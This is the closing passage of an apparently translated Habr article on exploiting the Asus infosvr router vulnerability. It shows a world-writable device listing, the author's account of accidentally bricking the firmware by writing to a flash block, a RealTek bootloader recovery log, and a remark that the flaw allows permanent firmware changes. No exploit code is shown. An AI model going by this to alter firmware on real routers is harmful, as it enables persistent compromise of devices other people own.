lrwxrwxrwx 1 root root 8 Sep 18 12:05 log -> /tmp/log=
drwxrwxrwx 2 root root 3 Sep 18 12:03 misc/
brw-rw-rw- 1 root root 31, 0 Sep 18 12:05 mtdblock0
brw-rw-rw- 1 root root 31, 1 Sep 18 12:05 mtdblock1
brw-rw-rw- 1 root root 31, 2 Sep 18 12:05 mtdblock2
brw-rw-rw- 1 root root 31, 3 Sep 18 12:05 mtdblock3
crw-rw-rw- 1 root root 1, 3 Sep 18 12:05 null
crw-rw-rw- 1 root root 108, 0 Sep 18 12:05 ppp
crw-rw-rw- 1 root 5 5, 2 Sep 18 12:05 ptmx
drwxrwxrwx 2 root root 3 Sep 18 12:03 pts/
crw-rw-rw- 1 root root 2, 0 Sep 18 20:23 ptyp0
crw-rw-rw- 1 root root 2, 1 Sep 18 12:05 ptyp1
crw-rw-rw- 1 root root 4, 64 Sep 18 12:05 ttyS0
crw-rw-rw- 1 root root 4, 65 Sep 18 12:05 ttyS1
crw-rw-rw- 1 root root 3, 0 Sep 18 20:23 ttyp0
crw-rw-rw- 1 root root 3, 1 Sep 18 12:05 ttyp1
crw-rw-rw- 1 root root 1, 9 Sep 18 12:05 urandom
#
I somehow inadvertently redirected something to / dev / mtdblock2 . It is recorded. The router worked. Then, when I decided to restart it - it did not boot. Having looked at what is being issued on UART, I realized that I still damaged the firmware. The router was booted in recovery mode (the Asus Firmware Restoration utility works with this mode).
Recovery mode
========== SPI =============
SDRAM CLOCK: 156MHZ
— Force into Single IO Mode —
| No chipID Sft chipSize blkSize secSize pageSize sdCk opCk chipName |
| 0 ef4016h 0h 400000h 10000h 1000h 100h 104 39 W25Q32|
-
---RealTek(RTL8196C)at 2012.04.09-16:54+0800 version v1.1f [16bit](390MHz)
no sys signature at 00010000!
Set 8196C PHY Patch OK
--- Ethernet init Okay!
<RealTek>
<RealTek>ps
Unknown command!
<RealTek>
<RealTek>ls
Unknown command!
<RealTek>
<RealTek> help
— COMMAND MODE HELP — HELP (?): Print this help message
D <Address> <Len>
DB <Address> <Len>
DW <Address> <Len>
EW <Address> <Value1> <Value2>…
EB <Address> <Value1> <Value2>…
CMP: CMP <dst> <src> <length>
IPCONFIG: <TargetAddress>
AUTOBURN: 0/1
LOADADDR: <Load Address>
J: Jump to <TargetAddress>
FLW <dst_ROM_offset> <src_RAM_addr> <length_Byte> <SPI cnt #>: Write offset-data to SPI from RAM
<RealTek>
Without thinking, I launched the same Firmware Restoration and restored the firmware.
Display of the Asus Firmware Restoration utility
<RealTek>D
File Start: 80500000,length=0
**TFTP GET File ASUSSPACELINK1,Size 0 Byte
**filename: 31 13 FFFFFFFE FFFFFFA9 Byte
run ASUSSPACELINK
**TFTP Client Upload, File Name: ASUSSPACELINK
**TFTP Client Upload File Size = 278ABC Bytes at 80500000
Success!
<RealTek>
Linux kernel (root-fs) upgrade.
checksum Ok!
burn Addr =0x10000! srcAddr=0x80500000 len =0xcd012
####head_offset: 0(0x0), flash_burnAddr: 0x10000, is_firmware: 1
####Start to burn…
...
Flash Write Successed!
<RealTek>
Root filesystem upgrade.
checksum Ok!
burn Addr =0x100000! srcAddr=0x805cd022 len =0x1aba9a
####head_offset: 839698(0xcd012), flash_burnAddr: 0xdd012, is_firmware: 1
####Start to burn…
...
Flash Write Successed!
<RealTek>
reboot.......
The fact of damage to the firmware in a running router, says that using a vulnerability, you can change it. Then the changes on the router will be permanent, and not just until the reboot, as it has been until now.
But I don’t have the time or the desire to research it.
The sources for AsusRouterTools , as well as Windows binaries , can be found in the repository on GitHub.
ZYOnce you have dealt with infosvr , why not use it also for its intended purpose? AsusDiscover is the only thing that will continue to work after installing the firmware with the vulnerability fixed.
Console version of Device Discovery
PS This is my first publication, so I will be glad to any advice and comments both on the article and on the program code.
PPS A little bit of indignation: Habrahabr should add protection against accidental publication to the article writing interface. Once I pressed Enter - and the Publish button worked. It is necessary to add either some kind of security checkbox, or to ask again before publishing, or to give an opportunity to immediately withdraw the sending to the publication. Yes, and even so much ... You can miss and poke her instead of "Preview". Why not so thought out?
UPD: Together with readers (@ a553), the exploits have fixed bugs that lead to a crash when receiving a response from some routers. Read more in this comment.
Source: https://habr.com/ru/post/253013/
All Articles